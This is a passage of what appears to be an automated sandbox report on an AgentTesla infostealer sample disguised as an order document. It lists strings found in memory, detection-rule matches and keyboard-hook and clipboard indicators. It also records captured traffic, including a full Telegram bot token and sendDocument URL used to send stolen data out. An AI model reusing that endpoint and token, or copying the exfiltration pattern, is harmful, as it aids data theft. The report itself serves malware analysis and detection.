(6256 OS)#391 PI.exe, 00000000.00000003.304797825.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304682884.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304443149.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305176599.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305196320.0000000005F18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comto
        Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304178747.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304498697.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304711949.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304659358.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304523813.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304553639.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304203849.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304474473.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304315545.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304286522.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304627606.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304419984.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304682884.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304443149.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304228747.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304257902.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304393632.0000000005F18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comtop/
        Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306418196.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306179537.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305459409.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306112026.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305947057.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305334059.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305363596.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305872051.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306630165.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305405967.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305302404.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305688249.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305902033.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305793816.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306146868.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306356978.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306084469.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305838697.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306295180.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305649023.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306583635.0000000005F18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comttod
        Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
        Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.300897558.0000000005F09000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.300940819.0000000005F0A000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.301936890.0000000005ED3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
        Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.301420395.0000000005F0F000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.301223897.0000000005F0F000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.301313763.0000000005F10000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.301537024.0000000005F10000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.301391011.0000000005F09000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.301444783.0000000005F0F000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.301460866.0000000005F10000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/
        Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
        Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
        Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.307525322.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.307540852.0000000005F18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/
        Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
        Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349450295.0000000005EDA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
        Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.307573750.0000000005F1B000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.307547855.0000000005F1B000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.307630920.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.307593958.0000000005F1B000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.307525322.0000000005F18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htmY
        Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
        Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303017257.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303319313.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303225948.0000000005F18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
        Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304178747.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303423712.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302714801.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303953142.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302783202.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302814290.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303491476.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303547143.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303113304.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304121403.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303924617.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303459883.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303190453.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303711642.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303288048.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304203849.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304055892.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304005746.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303259684.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303777091.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303357363.0000000005F18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/.
        Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302319712.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302714801.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302783202.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302814290.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302586272.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302345072.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302546639.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302387437.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302299146.0000000005F17000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302439715.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302630012.0000000005F18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/0
        Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302714801.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302783202.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302814290.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302586272.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302546639.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302387437.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302439715.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302630012.0000000005F18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/9
        Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302546639.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302387437.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302630012.0000000005F18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/FL
        Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302319712.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302714801.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302783202.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302814290.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302586272.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302345072.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302546639.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302387437.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302299146.0000000005F17000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302439715.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302630012.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303017257.0000000005F18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/K
        Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302586272.0000000005F18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/QO
        Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302714801.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302783202.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302814290.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302586272.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302546639.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302630012.0000000005F18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/T
        Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302439715.0000000005F18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0
        Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302714801.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302783202.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302814290.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302630012.0000000005F18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0-eo
        Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302546639.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302387437.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302439715.0000000005F18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0m
        Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302586272.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302546639.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302387437.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302439715.0000000005F18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/hu-h
        Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302630012.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303017257.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303319313.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303225948.0000000005F18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
        Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302586272.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302546639.0000000005F18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/oie.
        Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
        Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
        Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
        Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.301411124.0000000005F0A000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.301391011.0000000005F09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
        Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
        Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
        Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
        Source: WsdnBq.exe, 00000008.00000002.566476117.00000000032DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://VEVgTqSNHWikc.org
        Source: ORDER (6256 OS)#391 PI.exe, 00000004.00000002.567037453.0000000002CAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://VEVgTqSNHWikc.orgD
        Source: ORDER (6256 OS)#391 PI.exe, 00000004.00000002.565396808.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, WsdnBq.exe, 00000008.00000002.565696055.0000000003271000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
        Source: ORDER (6256 OS)#391 PI.exe, 00000004.00000002.565396808.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, WsdnBq.exe, 00000008.00000002.565696055.0000000003271000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
        Source: WsdnBq.exe, 00000008.00000002.565696055.0000000003271000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.orgMozilla/5.0
        Source: ORDER (6256 OS)#391 PI.exe, 00000004.00000002.567037453.0000000002CAF000.00000004.00000800.00020000.00000000.sdmp, WsdnBq.exe, 00000008.00000002.566476117.00000000032DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
        Source: ORDER (6256 OS)#391 PI.exe, 00000004.00000002.565396808.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, WsdnBq.exe, 00000008.00000002.565696055.0000000003271000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5962712783:AAFVWYP7zptQlynX_9COtuxYcx3Dl7EnfUQ/
        Source: WsdnBq.exe, 00000008.00000002.565696055.0000000003271000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5962712783:AAFVWYP7zptQlynX_9COtuxYcx3Dl7EnfUQ/1644584536appdatamacDpmac
        Source: ORDER (6256 OS)#391 PI.exe, 00000004.00000002.567037453.0000000002CAF000.00000004.00000800.00020000.00000000.sdmp, WsdnBq.exe, 00000008.00000002.566476117.00000000032DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5962712783:AAFVWYP7zptQlynX_9COtuxYcx3Dl7EnfUQ/sendDocument
        Source: ORDER (6256 OS)#391 PI.exe, 00000004.00000002.567037453.0000000002CAF000.00000004.00000800.00020000.00000000.sdmp, WsdnBq.exe, 00000008.00000002.566476117.00000000032DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org4
        Source: unknownHTTP traffic detected: POST /bot5962712783:AAFVWYP7zptQlynX_9COtuxYcx3Dl7EnfUQ/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dad9d3fba18902Host: api.telegram.orgContent-Length: 1079Expect: 100-continueConnection: Keep-Alive
        Source: unknownDNS traffic detected: queries for: api.ipify.org
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
        Source: unknownHTTPS traffic detected: 3.232.242.170:443 -> 192.168.2.4:49695 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49696 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 54.91.59.199:443 -> 192.168.2.4:49697 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49698 version: TLS 1.2

        Key, Mouse, Clipboard, Microphone and Screen Capturing

        barindex
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\WsdnBq.exe
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeCode function: 4_2_06CA3790 SetWindowsHookExW 0000000D,00000000,?,?
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeWindow created: window name: CLIPBRDWNDCLASS
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeWindow created: window name: CLIPBRDWNDCLASS

        System Summary

        barindex
        Source: 0.2.ORDER (6256 OS)#391 PI.exe.40a16e0.1.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
        Source: 0.2.ORDER (6256 OS)#391 PI.exe.40a16e0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
        Source: 4.0.ORDER (6256 OS)#391 PI.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
        Source: 4.0.ORDER (6256 OS)#391 PI.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
        Source: 0.2.ORDER (6256 OS)#391 PI.exe.40a16e0.1.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
        Source: 0.2.ORDER (6256 OS)#391 PI.exe.40a16e0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
        Source: 5.2.WsdnBq.exe.2e72288.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
        Source: 0.2.ORDER (6256 OS)#391 PI.exe.30f22b8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
        Source: 00000004.00000000.334155357.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
        Source: 00000000.00000002.343033622.0000000003FC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
        Source: Process Memory Space: ORDER (6256 OS)#391 PI.exe PID: 1688, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
        Source: Process Memory Space: ORDER (6256 OS)#391 PI.exe PID: 1948, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
        Source: initial sampleStatic PE information: Filename: ORDER (6256 OS)#391 PI.exe
        Source: 4.0.ORDER (6256 OS)#391 PI.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007bFD9F610Eu002d7B51u002d480Du002dB05Au002dE55A047CA86Au007d/u003991DE117u002d9CB5u002d4593u002dADFDu002d17D5BF3CC903.csLarge array initialization: .cctor: array initializer size 9257
        Source: ORDER (6256 OS)#391 PI.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: 0.2.ORDER (6256 OS)#391 PI.exe.40a16e0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
        Source: 0.2.ORDER (6256 OS)#391 PI.exe.40a16e0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
